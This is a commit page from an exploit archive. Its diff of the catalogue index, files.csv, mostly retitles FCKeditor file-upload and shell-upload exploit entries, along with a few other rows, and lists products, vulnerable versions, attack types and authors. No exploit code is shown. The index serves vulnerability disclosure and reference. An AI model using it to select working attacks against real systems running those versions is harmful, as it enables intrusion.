DB: 2015-07-30

4 new exploits
This commit is contained in:
Offensive Security 2015-07-30 05:02:27 +00:00
parent 7c8d57574c
commit 95ce541193
30 changed files with 2652 additions and 2176 deletions

100
files.csv
View file

@ -1226,7 +1226,7 @@ id,file,description,date,author,platform,type,port
1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 Insecure rc.local Permissions Plus System Crash Exploit",2006-02-08,kokanin,qnx,local,0
1482,platforms/php/webapps/1482.php,"SPIP <= 1.8.2g Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server <= 1.6 (non steam) Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0
1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 (connector.php) - Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0
1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager - connector.php) Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0
1485,platforms/php/webapps/1485.php,"RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit",2006-02-09,rgod,php,webapps,0
1486,platforms/linux/remote/1486.c,"Power Daemon <= 2.0.2 (WHATIDO) Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,532
1487,platforms/linux/remote/1487.c,"OpenVMPSd <= 1.3 - Remote Format String Exploit (Multiple Targets)",2006-02-10,"Gotfault Security",linux,remote,1589
@ -1671,7 +1671,7 @@ id,file,description,date,author,platform,type,port
1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module (lid) Remote SQL Injection Vulnerability",2006-06-28,KeyCoder,php,webapps,0
1962,platforms/osx/local/1962.pl,"Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0
1963,platforms/php/webapps/1963.txt,"GeekLog <= 1.4.0sr3 (_CONF[path]) Remote File Include Vulnerabilities",2006-06-29,Kw3[R]Ln,php,webapps,0
1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 f(u)ckeditor - Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
1965,platforms/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445
1967,platforms/windows/dos/1967.c,"Microsoft Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0
1968,platforms/php/webapps/1968.php,"deV!Lz Clanportal [DZCP] <= 1.34 (id) Remote SQL Injection Exploit",2006-07-01,x128,php,webapps,0
@ -1740,7 +1740,7 @@ id,file,description,date,author,platform,type,port
2032,platforms/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Remote Blind SQL Injection Exploit",2006-07-18,"Jacek Wlodarczyk",php,webapps,0
2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit (2)",2006-07-18,"w4g.not null",php,webapps,0
2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian ""pagvac"" Pastor",hardware,remote,0
2035,platforms/php/webapps/2035.php,"toendaCMS <= 1.0.0 (FCKeditor) Remote File Upload Exploit",2006-07-18,rgod,php,webapps,0
2035,platforms/php/webapps/2035.php,"toendaCMS <= 1.0.0 - (FCKeditor) Remote File Upload Exploit",2006-07-18,rgod,php,webapps,0
2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 Cookie Modification Privilege Escalation Vulnerability",2006-07-18,FarhadKey,php,webapps,0
2037,platforms/windows/dos/2037.c,"Dumb <= 0.9.3 (it_read_envelope) Remote Heap Overflow PoC",2006-07-19,"Luigi Auriemma",windows,dos,0
2039,platforms/windows/dos/2039.pl,"Microsoft Internet Explorer 6 (Content-Type) Stack Overflow Crash",2006-07-20,Firestorm,windows,dos,0
@ -2394,7 +2394,7 @@ id,file,description,date,author,platform,type,port
2702,platforms/php/webapps/2702.php,"Lithium CMS <= 4.04c (classes/index.php) Local File Include Exploit",2006-11-02,Kacper,php,webapps,0
2703,platforms/php/webapps/2703.txt,"Article System 0.6 (volume.php) Remote File Include Vulnerability",2006-11-02,GregStar,php,webapps,0
2704,platforms/php/webapps/2704.txt,"freewebshop.org script <= 2.2.2 - Multiple Vulnerabilities",2006-11-02,Spiked,php,webapps,0
2706,platforms/php/webapps/2706.txt,"MODx CMS <= 0.9.2.1 (FCKeditor) Remote File Include Vulnerability",2006-11-03,nuffsaid,php,webapps,0
2706,platforms/php/webapps/2706.txt,"MODx CMS <= 0.9.2.1 - (FCKeditor) Remote File Include Vulnerability",2006-11-03,nuffsaid,php,webapps,0
2707,platforms/php/webapps/2707.php,"PostNuke <= 0.763 (PNSV lang) Remote Code Execution Exploit",2006-11-03,Kacper,php,webapps,0
2708,platforms/windows/dos/2708.c,"Nullsoft Winamp <= 5.3 - (Ultravox-Max-Msg) Heap Overflow DoS PoC",2006-11-03,cocoruder,windows,dos,0
2709,platforms/php/webapps/2709.txt,"Creasito E-Commerce Content Manager (admin) Authentication Bypass",2006-11-03,SlimTim10,php,webapps,0
@ -5241,7 +5241,7 @@ id,file,description,date,author,platform,type,port
5615,platforms/php/webapps/5615.txt,"AS-GasTracker 1.0.0 Insecure Cookie Handling Vulnerability",2008-05-14,t0pP8uZz,php,webapps,0
5616,platforms/php/webapps/5616.txt,"ActiveKB <= 1.5 Insecure Cookie Handling/Arbitrary Admin Access",2008-05-14,t0pP8uZz,php,webapps,0
5617,platforms/php/webapps/5617.txt,"Internet Photoshow (Special Edition) - Insecure Cookie Handling Vuln",2008-05-14,t0pP8uZz,php,webapps,0
5618,platforms/php/webapps/5618.txt,"La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit",2008-05-14,EgiX,php,webapps,0
5618,platforms/php/webapps/5618.txt,"La-Nai CMS <= 1.2.16 - (fckeditor) Arbitrary File Upload Exploit",2008-05-14,EgiX,php,webapps,0
5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0
5620,platforms/php/webapps/5620.txt,"rgboard <= 3.0.12 (rfi/XSS) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0
5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript (page_to_include) RFI Vulnerability",2008-05-14,HaCkeR_EgY,php,webapps,0
@ -5310,16 +5310,16 @@ id,file,description,date,author,platform,type,port
5684,platforms/php/webapps/5684.txt,"Joomla Component Artist (idgalery) SQL Injection Vulnerability",2008-05-28,Cr@zy_King,php,webapps,0
5685,platforms/php/webapps/5685.txt,"FlashBlog (articulo_id) Remote SQL Injection Vulnerability",2008-05-28,HER0,php,webapps,0
5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader <= 8.1.2 - Malformed PDF Remote DoS PoC",2008-05-29,securfrog,windows,dos,0
5688,platforms/php/webapps/5688.php,"SyntaxCMS <= 1.3 (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
5688,platforms/php/webapps/5688.php,"SyntaxCMS <= 1.3 - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 (pid) Remote SQL Injection Vulnerability",2008-05-29,QTRinux,php,webapps,0
5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 - Local File Inclusion Vulnerabilitty (win)",2008-05-29,gmda,php,webapps,0
5691,platforms/php/webapps/5691.php,"CMS from Scratch <= 1.1.3 (fckeditor) Remote Shell Upload Exploit",2008-05-29,EgiX,php,webapps,0
5691,platforms/php/webapps/5691.php,"CMS from Scratch <= 1.1.3 - (fckeditor) Remote Shell Upload Exploit",2008-05-29,EgiX,php,webapps,0
5692,platforms/php/webapps/5692.pl,"Mambo Component mambads <= 1.0 RC1 Beta SQL Injection Vulnerability",2008-05-29,Houssamix,php,webapps,0
5693,platforms/php/webapps/5693.txt,"CMS from Scratch <= 1.1.3 (image.php) Directory Traversal Vulnerability",2008-05-29,Stack,php,webapps,0
5694,platforms/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,623
5695,platforms/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,8800
5696,platforms/php/webapps/5696.pl,"PHP Booking Calendar 10 d Remote SQL Injection Exploit",2008-05-29,Stack,php,webapps,0
5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
5698,platforms/php/webapps/5698.txt,"HiveMaker Professional <= 1.0.2 (cid) SQL Injection Vulnerability",2008-05-30,K-159,php,webapps,0
5699,platforms/php/webapps/5699.txt,"PsychoStats <= 2.3.3 - Multiple Remote SQL Injection Vulnerabilities",2008-05-31,Mr.SQL,php,webapps,0
5700,platforms/php/webapps/5700.htm,"CMSimple 3.1 - Local File Inclusion / Arbitrary File Upload Exploit",2008-05-31,irk4z,php,webapps,0
@ -5390,7 +5390,7 @@ id,file,description,date,author,platform,type,port
5767,platforms/php/webapps/5767.php,"Flux CMS <= 1.5.0 (loadsave.php) Remote Arbitrary File Overwrite Exploit",2008-06-09,EgiX,php,webapps,0
5768,platforms/php/webapps/5768.txt,"pNews 2.08 (shownews) Remote SQL Injection Vulnerability",2008-06-09,Cr@zy_King,php,webapps,0
5769,platforms/php/webapps/5769.pl,"Telephone Directory 2008 - Arbitrary Delete Contact Exploit",2008-06-09,Stack,php,webapps,0
5770,platforms/php/webapps/5770.php,"Achievo <= 1.3.2 (fckeditor) Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0
5770,platforms/php/webapps/5770.php,"Achievo <= 1.3.2 - (fckeditor) Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0
5771,platforms/php/webapps/5771.txt,"ErfurtWiki <= R1.02b (css) Local File Inclusion Vulnerabilities",2008-06-10,Unohope,php,webapps,0
5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 (comments) Remote SQL Injection Vulnerability",2008-06-10,Unohope,php,webapps,0
5773,platforms/php/webapps/5773.txt,"yblog 0.2.2.2 (xss/SQL) Multiple Vulnerabilities",2008-06-10,Unohope,php,webapps,0
@ -5463,7 +5463,7 @@ id,file,description,date,author,platform,type,port
5841,platforms/php/webapps/5841.txt,"ThaiQuickCart (sLanguage) Local File Inclusion Vulnerability",2008-06-17,"CWH Underground",php,webapps,0
5842,platforms/php/webapps/5842.txt,"PHP Site Lock 2.0 (index.php page) Remote SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0
5843,platforms/windows/dos/5843.html,"P2P Foxy Out of Memory Denial of Service Exploit",2008-06-17,Styxosaurus,windows,dos,0
5844,platforms/php/webapps/5844.php,"FreeCMS.us 0.2 (fckeditor) Arbitrary File Upload Exploit",2008-06-17,Stack,php,webapps,0
5844,platforms/php/webapps/5844.php,"FreeCMS.us 0.2 - (fckeditor) Arbitrary File Upload Exploit",2008-06-17,Stack,php,webapps,0
5845,platforms/php/webapps/5845.txt,"MyShoutPro 1.2 Final Insecure Cookie Handling Vulnerability",2008-06-17,Stack,php,webapps,0
5846,platforms/php/webapps/5846.txt,"eroCMS <= 1.4 (index.php site) SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0
5847,platforms/php/webapps/5847.txt,"WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability",2008-06-17,Cr@zy_King,php,webapps,0
@ -5525,7 +5525,7 @@ id,file,description,date,author,platform,type,port
5904,platforms/php/webapps/5904.txt,"Hedgehog-CMS 1.21 (header.php) Local File Inclusion Vulnerability",2008-06-22,CraCkEr,php,webapps,0
5905,platforms/php/webapps/5905.txt,"cmreams CMS 1.3.1.1 beta2 - (LFI/XSS) Multiple Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0
5906,platforms/php/webapps/5906.txt,"odars CMS 1.0.2 - Remote File Inclusion Vulnerability",2008-06-22,CraCkEr,php,webapps,0
5907,platforms/php/webapps/5907.pl,"emuCMS 0.3 (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
5907,platforms/php/webapps/5907.pl,"emuCMS 0.3 - (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
5908,platforms/php/webapps/5908.txt,"HoMaP-CMS 0.1 (index.php go) Remote SQL Injection Vulnerability",2008-06-23,SxCx,php,webapps,0
5909,platforms/php/webapps/5909.pl,"BlogPHP 2.0 - Remote Privilege Escalation Exploit",2008-06-23,Cod3rZ,php,webapps,0
5910,platforms/php/webapps/5910.txt,"Ready2Edit (pages.php menuid) Remote SQL Injection Vulnerability",2008-06-23,Mr.SQL,php,webapps,0
@ -5540,8 +5540,8 @@ id,file,description,date,author,platform,type,port
5919,platforms/php/webapps/5919.txt,"mm chat 1.5 - (LFI/XSS) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
5920,platforms/php/webapps/5920.txt,"ourvideo CMS 9.5 (rfi/lfi/XSS) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
5921,platforms/php/webapps/5921.txt,"cmsWorks 2.2 RC4 (mod_root) Remote File Inclusion Vulnerability",2008-06-23,CraCkEr,php,webapps,0
5922,platforms/php/webapps/5922.php,"cmsWorks 2.2 RC4 (fckeditor) Remote Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
5923,platforms/php/webapps/5923.pl,"Demo4 CMS 1b (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
5922,platforms/php/webapps/5922.php,"cmsWorks 2.2 RC4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
5923,platforms/php/webapps/5923.pl,"Demo4 CMS 1b - (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
5924,platforms/php/webapps/5924.txt,"Relative Real Estate Systems <= 3.0 (listing_id) SQL Injection Vuln",2008-06-24,K-159,php,webapps,0
5925,platforms/php/webapps/5925.txt,"ShareCMS 0.1 - Multiple Remote SQL Injection Vulnerabilities",2008-06-24,"CWH Underground",php,webapps,0
5926,platforms/hardware/remote/5926.txt,"Linksys WRT54G (firmware 1.00.9) Security Bypass Vulnerabilities (2)",2008-06-24,meathive,hardware,remote,0
@ -5562,7 +5562,7 @@ id,file,description,date,author,platform,type,port
5941,platforms/php/webapps/5941.txt,"polypager <= 1.0rc2 (sql/XSS) Multiple Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0
5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax <= 4.42 (category) SQL Injection Vulnerability",2008-06-26,boom3rang,php,webapps,0
5944,platforms/php/webapps/5944.txt,"Galmeta Post CMS 0.2 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0
5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit",2008-06-26,EgiX,php,webapps,0
5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework <= 0.6.4 - (fckeditor) Arbitrary File Upload Exploit",2008-06-26,EgiX,php,webapps,0
5946,platforms/php/webapps/5946.txt,"Riddles Complete Website 1.2.1 (riddleid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
5947,platforms/php/webapps/5947.txt,"Tips Complete Website 1.2.0 (tipid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
5948,platforms/php/webapps/5948.txt,"Jokes Complete Website 2.1.3 (jokeid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
@ -5620,7 +5620,7 @@ id,file,description,date,author,platform,type,port
6002,platforms/php/webapps/6002.pl,"Joomla Component altas 1.0 - Multiple Remote SQL Injection Exploit",2008-07-04,Houssamix,php,webapps,0
6003,platforms/php/webapps/6003.txt,"Joomla Component DBQuery <= 1.4.1.1 RFI Vulnerability",2008-07-04,SsEs,php,webapps,0
6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote BoF Exploit",2008-07-04,"Karol Wiesek",windows,remote,0
6005,platforms/php/webapps/6005.php,"Site@School <= 2.4.10 (fckeditor) Session Hijacking / File Upload Exploit",2008-07-04,EgiX,php,webapps,0
6005,platforms/php/webapps/6005.php,"Site@School <= 2.4.10 - (fckeditor) Session Hijacking / File Upload Exploit",2008-07-04,EgiX,php,webapps,0
6006,platforms/php/webapps/6006.php,"Thelia 1.3.5 - Multiple Vulnerabilities Exploit",2008-07-05,BlackH,php,webapps,0
6007,platforms/php/webapps/6007.txt,"Kasseler CMS 1.3.0 - (LFI/XSS) Multiple Vulnerabilities",2008-07-05,Cr@zy_King,php,webapps,0
6008,platforms/php/webapps/6008.php,"ImperialBB <= 2.3.5 - Remote File Upload Exploit",2008-07-05,PHPLizardo,php,webapps,0
@ -5927,7 +5927,7 @@ id,file,description,date,author,platform,type,port
6341,platforms/php/webapps/6341.txt,"WeBid 0.5.4 (item.php id) Remote SQL Injection Vulnerability",2008-09-01,Stack,php,webapps,0
6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 (go) Remote SQL Injection Vulnerability",2008-09-01,e.wiZz!,php,webapps,0
6343,platforms/php/webapps/6343.txt,"CMSbright (id_rub_page) Remote SQL Injection Vulnerability",2008-09-01,"BorN To K!LL",php,webapps,0
6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit",2008-09-01,Stack,php,webapps,0
6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-09-01,Stack,php,webapps,0
6345,platforms/windows/dos/6345.html,"VMware COM API ActiveX Remote Buffer Overflow PoC",2008-09-01,shinnai,windows,dos,0
6346,platforms/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 (uid) SQL Injection Exploit",2008-09-01,"Virangar Security",php,webapps,0
6347,platforms/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 (artid) SQL Injection Vulnerability",2008-09-02,MustLive,php,webapps,0
@ -5941,7 +5941,7 @@ id,file,description,date,author,platform,type,port
6355,platforms/windows/remote/6355.txt,"Google Chrome Browser 0.2.149.27 Automatic File Download Exploit",2008-09-03,nerex,windows,remote,0
6356,platforms/php/webapps/6356.php,"Moodle <= 1.8.4 - Remote Code Execution Exploit",2008-09-03,zurlich.lpt,php,webapps,0
6357,platforms/php/webapps/6357.txt,"aspwebalbum 3.2 (upload/sql/XSS) Multiple Vulnerabilities",2008-09-03,Alemin_Krali,php,webapps,0
6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-03,BugReport.IR,php,webapps,0
6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-03,BugReport.IR,php,webapps,0
6361,platforms/php/webapps/6361.txt,"Living Local Website (listtest.php r) SQL Injection Vulnerability",2008-09-03,"Hussin X",php,webapps,0
6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability",2008-09-04,"Hussin X",php,webapps,0
6363,platforms/php/webapps/6363.txt,"qwicsite pro (sql/XSS) Multiple Vulnerabilities",2008-09-04,Cr@zy_King,php,webapps,0
@ -5987,14 +5987,14 @@ id,file,description,date,author,platform,type,port
6407,platforms/windows/remote/6407.c,"Microworld Mailscan 5.6.a Password Reveal Exploit",2008-09-09,SlaYeR,windows,remote,0
6408,platforms/php/webapps/6408.txt,"CMS Buzz (id) Remote SQL Injection Vulnerability",2008-09-09,"security fears team",php,webapps,0
6409,platforms/php/webapps/6409.txt,"Availscript Article Script (articles.php) Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0
6410,platforms/php/webapps/6410.txt,"Kim Websites 1.0 (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-09,Ciph3r,php,webapps,0
6410,platforms/php/webapps/6410.txt,"Kim Websites 1.0 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-09,Ciph3r,php,webapps,0
6411,platforms/php/webapps/6411.txt,"Availscript Photo Album (pics.php) Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0
6412,platforms/php/webapps/6412.txt,"Availscript Classmate Script (viewprofile.php) SQL Injection Vulnerability",2008-09-09,Stack,php,webapps,0
6413,platforms/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusion Vulnerabilities",2008-09-10,SirGod,php,webapps,0
6414,platforms/windows/remote/6414.html,"Peachtree Accounting 2004 (PAWWeb11.ocx) ActiveX Insecure Method",2008-09-10,"Jeremy Brown",windows,remote,0
6416,platforms/php/webapps/6416.txt,"Libera CMS <= 1.12 (Cookie) Remote SQL Injection Exploit",2008-09-10,StAkeR,php,webapps,0
6417,platforms/php/webapps/6417.txt,"Availscript Jobs Portal Script (jid) SQL Injection Vulnerability (auth)",2008-09-10,InjEctOr5,php,webapps,0
6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite / Jaw Portal free (fckeditor) Arbitrary File Upload Vuln",2008-09-10,reptil,php,webapps,0
6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - (fckeditor) Arbitrary File Upload Vuln",2008-09-10,reptil,php,webapps,0
6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0
6421,platforms/php/webapps/6421.php,"Wordpress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0
6422,platforms/php/webapps/6422.txt,"phpvid 1.1 (xss/SQL) Multiple Vulnerabilities",2008-09-10,r45c4l,php,webapps,0
@ -6021,7 +6021,7 @@ id,file,description,date,author,platform,type,port
6445,platforms/php/webapps/6445.txt,"SkaLinks 1.5 (register.php) Remote Arbitrary Add Editor Vulnerability",2008-09-12,mr.al7rbi,php,webapps,0
6446,platforms/php/webapps/6446.txt,"vbLOGIX Tutorial Script <= 1.0 (cat_id) SQL Injection Vulnerability",2008-09-12,FIREH4CK3R,php,webapps,0
6447,platforms/php/webapps/6447.txt,"pNews 2.03 (newsid) Remote SQL Injection Vulnerability",2008-09-12,r45c4l,php,webapps,0
6448,platforms/php/webapps/6448.txt,"WebPortal CMS <= 0.7.4 (fckeditor) Arbitrary File Upload Vulnerability",2008-09-12,S.W.A.T.,php,webapps,0
6448,platforms/php/webapps/6448.txt,"WebPortal CMS <= 0.7.4 - (fckeditor) Arbitrary File Upload Vulnerability",2008-09-12,S.W.A.T.,php,webapps,0
6449,platforms/php/webapps/6449.php,"pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit",2008-09-13,Stack,php,webapps,0
6450,platforms/php/webapps/6450.pl,"Sports Clubs Web Panel 0.0.1 - Remote Game Delete Exploit",2008-09-13,ka0x,php,webapps,0
6451,platforms/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion/PHPInfo Disclosure Vulns",2008-09-13,SirGod,php,webapps,0
@ -6143,7 +6143,7 @@ id,file,description,date,author,platform,type,port
6570,platforms/windows/remote/6570.rb,"ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX BoF Exploit (meta)",2008-09-25,"Kevin Finisterre",windows,remote,0
6571,platforms/php/webapps/6571.txt,"openengine <= 2.0 beta4 - Remote File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0
6572,platforms/php/webapps/6572.txt,"Atomic Photo Album 1.1.0pre4 (XSS/SQL) Remote Vulnerabilities",2008-09-25,d3v1l,php,webapps,0
6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 (fckeditor) Arbitrary File Upload Exploit",2008-09-25,Stack,php,webapps,0
6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - (fckeditor) Arbitrary File Upload Exploit",2008-09-25,Stack,php,webapps,0
6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection Exploit",2008-09-26,Stack,php,webapps,0
6575,platforms/php/webapps/6575.txt,"barcodegen <= 2.0.0 (class_dir) Remote File Inclusion Vulnerability",2008-09-26,"Br0k3n H34rT",php,webapps,0
6576,platforms/php/webapps/6576.txt,"Ultimate Webboard 3.00 (Category) SQL Injection Vulnerability",2008-09-26,"CWH Underground",php,webapps,0
@ -6348,7 +6348,7 @@ id,file,description,date,author,platform,type,port
6780,platforms/php/webapps/6780.txt,"zeeproperty (adid) Remote SQL Injection Vulnerability",2008-10-18,"Hussin X",php,webapps,0
6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection Exploit",2008-10-18,Xianur0,php,webapps,0
6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit",2008-10-18,StAkeR,php,webapps,0
6783,platforms/php/webapps/6783.php,"Nuke ET <= 3.4 (fckeditor) Remote Arbitrary File Upload Exploit",2008-10-18,EgiX,php,webapps,0
6783,platforms/php/webapps/6783.php,"Nuke ET <= 3.4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-10-18,EgiX,php,webapps,0
6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader <= 1.5 - Remote File Creation Exploit",2008-10-18,StAkeR,php,webapps,0
6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite (init.php) Remote File Inclusion Vulnerability",2008-10-19,NoGe,php,webapps,0
6786,platforms/solaris/remote/6786.pl,"Solaris 9 [UltraSPARC] sadmind Remote Root Exploit",2008-10-19,kingcope,solaris,remote,111
@ -6710,7 +6710,7 @@ id,file,description,date,author,platform,type,port
7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 (API_HOME_DIR) RFI Vulnerability",2008-11-18,"Ghost Hacker",php,webapps,0
7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 Insecure Cookie Handling Vulnerability",2008-11-18,x0r,php,webapps,0
7157,platforms/php/webapps/7157.txt,"Alex News-Engine 1.5.1 - Remote Arbitrary File Upload Vulnerability",2008-11-19,Batter,php,webapps,0
7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 (fckeditor) Arbitrary File Upload Vulnerability",2008-11-19,Batter,php,webapps,0
7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 - (fckeditor) Arbitrary File Upload Vulnerability",2008-11-19,Batter,php,webapps,0
7159,platforms/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) - Multiple LFI Exploit",2008-11-19,StAkeR,php,webapps,0
7160,platforms/php/webapps/7160.php,"MyTopix <= 1.3.0 (notes send) Remote SQL Injection Exploit",2008-11-19,cOndemned,php,webapps,0
7162,platforms/php/webapps/7162.pl,"MauryCMS <= 0.53.2 - Remote Shell Upload Exploit",2008-11-19,StAkeR,php,webapps,0
@ -7586,7 +7586,7 @@ id,file,description,date,author,platform,type,port
8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 Persistent XSS Vulnerability",2009-02-16,rAWjAW,php,webapps,0
8058,platforms/windows/dos/8058.pl,"TPTEST <= 3.1.7 - Stack Buffer Overflow PoC",2009-02-16,ffwd,windows,dos,0
8059,platforms/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption PoC",2009-02-16,Nine:Situations:Group,windows,remote,0
8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 (fckeditor) Arbitrary File Upload Exploit",2009-02-16,Sp3shial,php,webapps,0
8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 - (fckeditor) Arbitrary File Upload Exploit",2009-02-16,Sp3shial,php,webapps,0
8061,platforms/php/webapps/8061.pl,"simplePms CMS <= 0.1.4 - LFI / Remote Command Execution Exploit",2009-02-16,Osirys,php,webapps,0
8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b (sql/XSS) Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0
8063,platforms/php/webapps/8063.txt,"novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0
@ -10766,7 +10766,7 @@ id,file,description,date,author,platform,type,port
11768,platforms/php/webapps/11768.txt,"Newbie CMS File Disclosure Vulnerability",2010-03-15,JIKO,php,webapps,0
11769,platforms/hardware/dos/11769.py,"iPhone Springboard Malformed Character Crash PoC",2010-03-15,"Chase Higgins",hardware,dos,0
11770,platforms/linux/dos/11770.txt,"WFTPD 3.3 - Remote REST DoS",2010-03-16,dmnt,linux,dos,21
11771,platforms/php/webapps/11771.txt,"osCMax 2.0 (fckeditor) Remote File Upload",2010-03-16,ITSecTeam,php,webapps,0
11771,platforms/php/webapps/11771.txt,"osCMax 2.0 - (fckeditor) Remote File Upload",2010-03-16,ITSecTeam,php,webapps,0
11772,platforms/php/webapps/11772.txt,"Joomla Component com_rwcards - Local File Inclusion",2010-03-16,"ALTBTA ",php,webapps,0
